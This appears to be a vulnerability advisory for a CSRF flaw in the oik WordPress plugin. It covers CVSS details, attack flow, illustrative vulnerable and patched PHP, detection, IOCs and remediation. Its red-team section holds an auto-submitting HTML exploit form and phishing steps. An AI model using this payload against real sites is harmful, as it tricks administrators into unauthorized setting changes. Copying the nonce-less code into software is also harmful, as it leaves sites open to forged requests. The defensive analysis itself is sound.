CVE-2025-54671
Executive Summary
CVE-2025-54671 is a Cross-Site Request Forgery (CSRF) vulnerability affecting the oik WordPress plugin by Bobbingwide, up to and including version 4.15.2. This vulnerability allows an attacker to perform unauthorized actions on behalf of an authenticated administrator, such as modifying plugin settings or triggering unintended operations, without the victim's consent. The attack requires social engineering to trick a logged-in admin into clicking a malicious link or visiting a crafted page.
Since this is a WordPress plugin vulnerability, it is critical to treat it within the WordPress ecosystem context. The oik plugin provides utility functions for WordPress developers, and a CSRF flaw here can lead to configuration tampering or privilege escalation within the WordPress admin panel.
CVSS Score: 4.3 (Medium)
EPSS Score: 0.0% (Low exploitation probability currently)
Patch Status: UNKNOWN / UNPATCHED – No official patch has been released by the vendor as of this analysis.

Supply Chain & Package Security
This vulnerability resides in a WordPress plugin distributed via the official WordPress plugin repository. The oik plugin is not an NPM, PyPI, Go, or Ruby package, but it is part of the WordPress supply chain. Administrators should monitor the plugin's update channel and consider disabling or replacing the plugin if no patch is forthcoming.
CVSS Breakdown & Threat Level
- Attack Vector (AV): Network (N) – The attack is carried out over the network.
- Attack Complexity (AC): Low (L) – No special conditions required.
- Privileges Required (PR): None (N) – The attacker does not need prior authentication.
- User Interaction (UI): Required (R) – The victim must be tricked into clicking a link or visiting a page.
- Scope (S): Unchanged (U) – The vulnerable component remains the same.
- Confidentiality Impact (C): None (N) – No data disclosure.
- Integrity Impact (I): Low (L) – Limited modification of data or settings.
- Availability Impact (A): None (N) – No denial of service.
Threat Level: Medium. While the CVSS score is 4.3, the lack of a patch and the potential for chaining with other vulnerabilities (e.g., stored XSS) could elevate the risk.
Deep Dive & Mechanics
The oik plugin fails to implement proper CSRF tokens or nonces on certain administrative actions. This allows an attacker to craft a malicious HTTP request (e.g., a POST to wp-admin/admin-post.php with specific parameters) that, when executed by an authenticated admin, will perform an action on behalf of the admin without their knowledge.
Attack Flow:
- Attacker identifies a vulnerable endpoint in oik (e.g., settings update, plugin activation/deactivation).
- Attacker crafts a malicious HTML page or email containing an auto-submitting form or an
<img>tag pointing to the vulnerable endpoint. - Attacker lures an authenticated WordPress admin to visit the crafted page.
- The victim's browser sends the forged request, including the admin's session cookies.
- The oik plugin processes the request without verifying the origin, leading to unauthorized changes.
WordPress Context: WordPress uses nonces to protect against CSRF, but the oik plugin apparently does not implement them for all its actions. This is a common oversight in plugin development.
Vulnerable vs. Patched Code
Since no patch is available, we can only describe the vulnerable pattern. A typical vulnerable code snippet in oik might look like:
// Vulnerable: No nonce check
function oik_save_settings() {
if ( isset($_POST['oik_option']) ) {
update_option('oik_option', $_POST['oik_option']);
}
}
add_action('admin_post_oik_save_settings', 'oik_save_settings');
A patched version would include a nonce verification:
// Patched: Nonce check added
function oik_save_settings() {
if ( ! isset($_POST['_wpnonce']) || ! wp_verify_nonce($_POST['_wpnonce'], 'oik_save_settings_nonce') ) {
return;
}
if ( isset($_POST['oik_option']) ) {
update_option('oik_option', sanitize_text_field($_POST['oik_option']));
}
}
add_action('admin_post_oik_save_settings', 'oik_save_settings');
Exploitation & Lab Setup
Red Team
Prerequisites:
- A WordPress site with oik plugin <= 4.15.2 installed and an authenticated admin session.
- Attacker-controlled web server or ability to inject HTML into a page the admin visits.
Exploit Payload (HTML):
<html>
<body>
<form action="http://target-site.com/wp-admin/admin-post.php" method="POST">
<input type="hidden" name="action" value="oik_save_settings">
<input type="hidden" name="oik_option" value="malicious_value">
<input type="submit" value="Click me">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Steps:
- Host the above HTML on an attacker-controlled server.
- Send a phishing email to the admin with a link to the hosted page.
- When the admin visits, the form auto-submits, changing the oik option.
Blue Team
Detection:
- Monitor for unexpected POST requests to
wp-admin/admin-post.phpwithaction=oik_*parameters. - Look for unusual referer headers or missing
_wpnoncefields in admin POST requests. - Use the detection rules below.
Mitigation:
- Disable the oik plugin until a patch is available.
- Implement a Web Application Firewall (WAF) rule to block requests to
admin-post.phpwithout a valid nonce. - Educate administrators about phishing and CSRF risks.
Indicators of Compromise (IOCs)
- Network: HTTP POST requests to
/wp-admin/admin-post.phpwithactionparameter starting withoik_and no_wpnoncefield. - File: Unexpected changes to WordPress options table entries prefixed with
oik_. - Log: WordPress debug log entries showing
oik_save_settingsor similar actions without nonce. - Behavior: Unauthorized changes to plugin settings or activation/deactivation of oik features.

Remediation & Mitigation
Immediate Actions:
- Disable the oik plugin until a patch is released.
- Implement a WAF rule to block POST requests to
admin-post.phpthat containaction=oik_without a valid nonce. - Monitor logs for the IOCs listed above.
Long-Term Fix:
- The vendor must add nonce verification to all admin actions in the oik plugin. The patched code example above should be applied to every
admin_post_*hook. - Consider replacing the plugin with an alternative if no patch is provided within a reasonable timeframe.
User Education:
- Train administrators to recognize phishing attempts and avoid clicking suspicious links while logged into WordPress.
